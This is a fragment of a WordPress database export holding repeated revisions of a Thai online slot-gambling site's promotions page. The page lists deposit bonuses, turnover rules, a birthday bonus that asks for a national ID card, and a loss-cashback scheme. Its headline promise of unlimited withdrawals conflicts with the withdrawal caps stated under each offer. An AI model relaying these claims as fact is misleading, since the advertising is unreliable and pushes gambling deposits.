d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong> เพื่อยืนยันวันเกิด (ข้อมูลถูกเก็บอย่างปลอดภัย)</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:54:14','2025-10-23 07:54:14','',27,'https://megabet333.biz/?p=80',0,'revision','',0),(81,3,'2025-10-23 07:54:15','2025-10-23 07:54:15','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:54:15','2025-10-23 07:54:15','',27,'https://megabet333.biz/?p=81',0,'revision','',0),(82,3,'2025-10-23 07:55:31','2025-10-23 07:55:31','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:55:31','2025-10-23 07:55:31','',27,'https://megabet333.biz/?p=82',0,'revision','',0),(83,3,'2025-10-23 07:55:31','2025-10-23 07:55:31','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ 